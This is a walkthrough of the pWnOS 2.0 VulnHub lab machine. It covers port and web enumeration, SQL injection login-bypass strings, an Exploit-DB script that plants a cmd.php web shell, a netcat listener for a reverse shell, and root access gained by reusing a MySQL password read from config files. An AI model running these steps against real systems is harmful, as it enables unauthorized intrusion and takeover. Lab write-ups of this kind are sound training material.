VulnHub: pWnOS: 2.0 (Pre-Release)

pWnOS: 2.0 (Pre-Release)

Initial Foothold

1. Network discovery

nmap -sn 10.10.10.200/24

My target is 10.10.10.100.

2. Port scan

nmap -Pn 10.10.10.100
nmap -Pn -p1000- 10.10.10.100

3. OS and service scan

nmap -A -p22,80 10.10.10.100

4. Vuln scan

nmap --script vuln -p22,80 10.10.10.100

There’re directories on HTTP site as shown.

Service Enumeration

• 22/tcp OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)

Connect to SSH

ssh 10.10.10.100

No any banners appear.

• 80/tcp Apache httpd 2.2.17 ((Ubuntu))

1. Nikto scan

nikto -h http://10.10.10.100

There’re sub-directories as listed.

2. Further directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q

3. Access the site

Note the email ‘admin@isints.com’ in case I need it.

Register the site.

Follow activation link

Login, nothing comes up.

However if you supply SQL injection, you also get admin panel, but It’s nothing anyway

Here’s my list of tested query

1' or 1=1--   -> failed
1' or 1=1-- -  -> failed
1' or 1=1--+  -> failed
1' or 1=1#  -> succeeded

Another interesting directory is /blog

Viewing page source revealed that It’s Simple PHP Blog 0.4.0.

Exploitation

1. Search for existing exploit, I came across this script.

Offensive Security's Exploit Database Archive

Look up scipt number and copy from searchsploit

Copy command

searchsploit -m 1191

Run the script for testing

./1191.pl

Now I have the usage.

Since I want shell, my choice is number 1

./1191.pl -h http://10.10.10.100/blog -e 1

cmd.php is created and stored in http://10.10.10.100/blog/images/

Access the path

Since I created the cmd.php, but I don't know how to use. So I looked up in the code and there’s GET parameter, cmd.

Try the script

http://10.10.10.100/blog/images/cmd.php?cmd=id

It’s worked.

2. Get the reverseshell

Create listener on port 443

rlwrap nc -lvp 443

I used this cheat sheet.

Reverse Shell Cheat Sheet

The method is intercept the resuest w/ Burp Suite and send to the repeater.

Copy command and encode to URL w/ Burp Suite Decoder

Paste the encoded command

After my tries, I succceded w/ this command.

Privilege Escalation

1. Directory Explore

There’s many directories to explore as listed:

/var/www
/var
/var/logs
/var/backups
/var/mail
/home/
/opt
/tmp

After Exploring I came across some files in /var/www and /var

Here’re commands.

cd /var/www
ls -la

I came across mysqli_connect.php

cat /var/www/mysqli_connect.php

It’s a credential of MySQL.

cd /var/
ls -la

I came across another mysqli_connect.php

cat /var/mysqli_connect.php

It’s another credential of mysql.

Before use it to access MySQL. I used to login as root in case there’s a re-using password.

su root
password: goodday

Failed!

Another one

su root
password: goodday

whoami

Now I’m root.